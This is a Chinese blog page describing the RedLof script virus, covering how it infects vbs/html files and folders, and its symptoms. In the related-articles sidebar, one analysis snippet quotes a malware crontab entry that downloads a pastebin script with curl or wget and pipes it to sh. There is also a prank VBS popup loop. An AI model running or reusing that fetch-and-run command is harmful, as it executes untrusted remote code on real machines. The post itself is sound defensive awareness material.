RedLof病毒

最新推荐文章于 2021-01-18 19:24:24 发布
最新推荐文章于 2021-01-18 19:24:24 发布
阅读量606 收藏
点赞数
分类专栏: 病毒知识 文章标签: windows 脚本 html 工具 网络 xp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tianmanfu/article/details/1617021
版权

此病毒可以在Windows 9X、Windows 2000、Windows XP等操作系统环境下正常运行。它感染脚本类型的文件,运行时,全盘查找脚本类型的文件(vbs,htm, html等),如果找到,则将病毒自身加入这些文件的尾部,完成感染。该病毒还会疯狂感染文件夹,会在感染的文件夹下产生两个文件,一个名为:desktop.ini的目录配置文件,一个名为:folder.htt的病毒体文件,当用户双击鼠标进入被感染的文件夹时,病毒就会被激活,由于病毒每激活一次,就会在内存中复制一次,所以当用户多次进入被感染的文件夹时,病毒就会大量进入内存,造成计算机运行速度越来越慢,而且该病毒还会随着信件模板,进行网络传播。

病毒发作现象:

此病毒会有如下特征,如果用户发现计算机中有这些特征,则很有可能中了此病毒:

一、 如果对脚本文件比较熟悉,比如说网页设计人员等,可以查找一些自己熟悉的vbs,htm, html等类型的文件,用编辑工具查看其内容,看是否能发现可疑代码。
二、 病毒会在感染文件夹时,产生两个病毒文件:desktop.ini和folder.htt。
三、 该病毒会使计算机运行速度变慢。

tianmanfu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vbs实现恶搞无限弹窗,复制粘贴就能用
RandowWrite
08-09 8万+
vbs简单实现弹窗 直接新建txt文档,复制粘贴下面代码: do a =msgbox("你怕是个ZZ吧?",vbYesNoCancel,"一份认真的问卷调查") if a =vbYes then msgbox "emmmm,还算有点自知之明",,"恭喜你,真正的认识了自己!" exit do elseif a =vbNo then b =msgbox("心里没点AC数吗?",v...
火绒安全一面病毒样本分析
innovation的博客
03-15 1386
Summary: 病毒高危行为: 请求一系列加密的未知IP的443端口,连接可能与其他恶意软件通讯;尝试HTTP但是全都失败了 使用了大量的微软提供的加密函数,已知是AES对称加密 过程中怀疑使用了代码混淆 存在多处绕检测,反调试行为:比如频繁分配内存调用native方法,存在用另一个用户开启线程;多处使用了RDTSC指令来比对执行时间检测虚拟化或反调试;存在大量延迟尝试绕检测;存在LdrLoadDll动态调用绕检测;可能读取PEB信息检测调试器;修改token权限 MD5 974d669.
记录日志:腾讯云服务器遭遇挖矿病毒 清除操作日志
qq_44752800的博客
01-18 1215
你未必出类拔萃,但一定与众不同 12月16日下午16时许 腾讯云服务器部署项目时,项目不管上没上线,tomcat原本是启动的,但是非正常原因断开连接,结束 重新启动多次tomcat发现都会非正常关闭,查看服务器cpu使用率奇高无比,最高的时候一个达到97%的CPU占用率,发现不明进程正在运行,百度一下发现是挖矿病毒,还是两种;记录一下操作日志,方便以后再次清除; [root@VM-0-6-centos bin]# top -H top - 16:57:21 up 2 days, 1:57, 1 us.
病毒样本分析小结
星焱宖
05-27 3142
这是笔者跟从具有多年反病毒引擎开发人员学习感悟的一些知识点,希望与大家一同交流
red zone
xiaocaichonga的专栏
08-18 866
来源:http://homepage.ntlworld.com/jonathan.deboynepollard/FGA/function-perilogues.html The gen on function perilogues. Yes, "perilogue" is a real word — sort of.It's only ever been used as a techn
解决virus.vbs.wiritebin.a和Virus.Win32.Ramin.x病毒
热门推荐
sanqima的专栏
07-13 1万+
virus.vbs.writebin.a是一种VB脚本木马病毒,该病毒会在电脑磁盘上篡改html、exe、dll这3种文件;Virus.Win32.Ramin.x也是一种木马病毒,它主要感人exe、dll这2中文件。 ...
病毒样本
GodsLeft的专栏
05-26 4452
crontab可疑行 # crontab脚本,删掉后会自动重写 */23 * * * * (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh 查看其中的qbbSdzZd文件 > wget https://pastebin.com/raw/qbbS...
对勒索病毒GandCrab5.1的一次成功应急响应(附解密工具+加密样本)
redwand的博客
03-20 1406
正月十五晚上,在家刚吃完元宵接到电话,朋友公司遭受勒索病毒攻击,数据库文件被加密,黑客通过暗网勒索 15000 美金赎金。一听勒索软件,顿时觉得头大,只好死马当活马医了,开始行动。先看下病毒在每个目录留下的 txt 文件 CVMKJ-DECRYPT.txt。 可以看到该病毒的名称及版本,GandCrab v5.1,一顿百度,了解到,之前已经有某安全厂商对此病毒进行了一系列分析,直接拿来主义...
如何预防计算机病毒
箫箫博客
05-20 2636
病毒,是指能够破坏计算机系统,影响计算机工作并能实现自我复制的一段程序或指令代码。随着计算机工业的发展,病毒程序层出不穷,到了21世纪的今天它的种类已经达到千万种。虽然病毒的类型有很多,变型的病毒更无法计算,但是就其传染对象来分只不过四类:BIOS、硬盘引导区、操作系统与应用程序病毒。在知道了病毒的定义与分类以
“冲击波”病毒的症状和解决方案
箫箫博客
05-20 1643
“冲击波”病毒Worm.msBlast是第一个利用RPC漏洞进行攻击和传染的病毒!漏洞存在于Windows NT、Windows 2000、Windows XP和微软最新主要操作系统Windows Server 2003。 受感染的机器将会出现下列症状:1、莫名其妙地死机或重新启动计算机或显示60秒倒计时关机;2、IE浏览器不能正常地打开链接; 3、不能复制粘贴;4、有时出现应用程序,比如Wo
病毒的本质
箫箫博客
05-19 1275
一,病毒神话我们先看看让大家“兴奋”、“激动”的病毒技术。1,CIH,简直成了神话,CIH的作者也成为无数人的偶像。这神话,是AVer吹出来的,这偶像,只是中国人盲目崇拜的延续,外国人没这臭毛病。看看这个病毒里究竟有什么?1K多点的代码,再厉害能有什么?我觉得这个病毒唯一比较好的地方就是它的非常优化。这种优化,其实说白了也不难,只要稍微有些汇编编程经验,再加上一部指令手册(至少要有指令长度),再有
“黑炸弹”病毒来袭 能删除硬盘文件
箫箫博客
05-19 1199
信报讯 “熊猫烧香”之后,有多种恶性病毒模仿其传播和破坏方式,试图进行更严重的破坏。“黑炸弹”病毒就是这样一个例子,它采用与“熊猫烧香”类似的网页传播方式,传播迅速,并会破坏硬盘上的文件。  这是一个可以在Win9X/2000/XP等操作系统上运行的蠕虫病毒。运行后会把D盘到Z盘上所有的小于自身文件长度的文件删除,然后把自己伪装成目标文件。对于大于自身文件长度的文件,该蠕虫将用自己的文件内容覆
病毒的传播途径
箫箫博客
05-20 1147
计算机病毒的传播主要是通过拷贝文件、传送文件、运行程序等方式进行。而主要的传播途径有以下几种:1、硬盘因为硬盘存储数据多,在其互相借用或维修时,将病毒传播到其他的硬盘或软盘上。2、软盘软盘主要是携带方便,早期时候在网络还不普及时,为了计算机之间互相传递文件,经常使用软盘,这样,通过软盘,也会将一台机子的病毒传播到另一台机子。3、光盘光盘的存储容量大,所以大多数软件都刻录在光
病毒杀不死的原因与对策
箫箫博客
05-19 1093
一、病毒杀不死的原因   经常听人说,病毒软件报告杀死了某某病毒,可是重新启动后该病毒仍旧存在,无法杀死。病毒杀不死的原因主要有:   1.病毒正在运行。由于Windows保护正在运行的程序,所以杀毒软件是无法杀死正在运行的病毒。即使是真的杀死了病毒,电脑正常关机时内存中活动的病毒还会再复制一个病毒到硬盘上。   2.病毒隐藏在系统还原的文件夹“_restore”中。 二、对策   1.在Wind
电脑病毒的预防
箫箫博客
05-20 1075
1、平常准备可正常开机之软盘,并贴上写保护。※检查电脑的任何问题,或者是解毒,最好在没有病毒干扰的环境下进行,才能完整测出真正的原因,或是彻底解决病毒的侵入。 2、重要资料,必须备份。 ※资料是最重要的,程序损坏了可重新COPY,甚至再买一份,但是自己键入的资料,可能是三年的会计资料,可能是画了三个月的图片,结果某一天,硬盘坏了或者病毒的因素,会让人欲哭无泪,所以一般性的备份是绝对必要
最近流行ARP欺骗攻击
箫箫博客
06-24 913
[注意]最近流行ARP欺骗攻击 最近网络上很流行一种攻击方式,在你的所有网页里嵌入病毒或广告代码,有时是不定时出现,但是无论你怎么在自己服务器上面怎么查,都找不出原因。甚至重做系统都没有效果。因为这个攻击方式还有很多人都被蒙在鼓里,所以在此公布出来给大家分享,请各位多注意! 首先,判断是否受到arp欺骗式攻击。 在你系统的命令行下输入:arp -a 会
病毒的分类
箫箫博客
05-20 884
一. 传统开机型病毒:纯粹的开机型病毒多利用软碟开机时侵入电脑系统, 然後再伺机感染其他的软碟或硬碟, 例如∶STONED 3 ( 米开朗基罗). DISK KILLER. HEAD ELEVEN.目前市面上大多数的防毒. 扫毒程式均可预防此类病毒, 一般电脑用户对於此类病毒最好的预防方式, 即是避免使用外来软碟开机.以1990年以後出品的AMI BIOS而言, 就已经提供了设定由硬碟开机
什么是计算机病毒
箫箫博客
05-20 805
“计算机病毒”为什么叫做病毒。首先,与医学上的“病毒”不同,它不是天然存在的,是某些人利用计算机软、硬件所固有的脆弱性,编制具有特殊功能的程序。其能通过某种途径潜伏在计算机存储介质(或程序)里,当达到某种条件时即被激活,它用修改其他程序的方法将自己的精确拷贝或者可能演化的形式放入其他程序中,从而感染它们,对计算机资源进行破坏的这样一组程序或指令集合。 1994年2月18日,我国正式颁布实施了《
病毒的危害
箫箫博客
05-20 732
计算机病毒会感染、传播,但这并不可怕,可怕的是病毒的破坏性。其主要危害有:1、攻击硬盘主引导扇区、Boot扇区、FAT表、文件目录,使磁盘上的信息丢失。 2、删除软盘、硬盘或网络上的可执行文件或数据文件,使文件丢失。 3、占用磁盘空间。 4、修改或破坏文件中的数据,使内容发生变化。 5、抢占系统资源,使内存减少。 6、占用CPU运行时间,使运行效率降低。 7、对整个磁盘

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值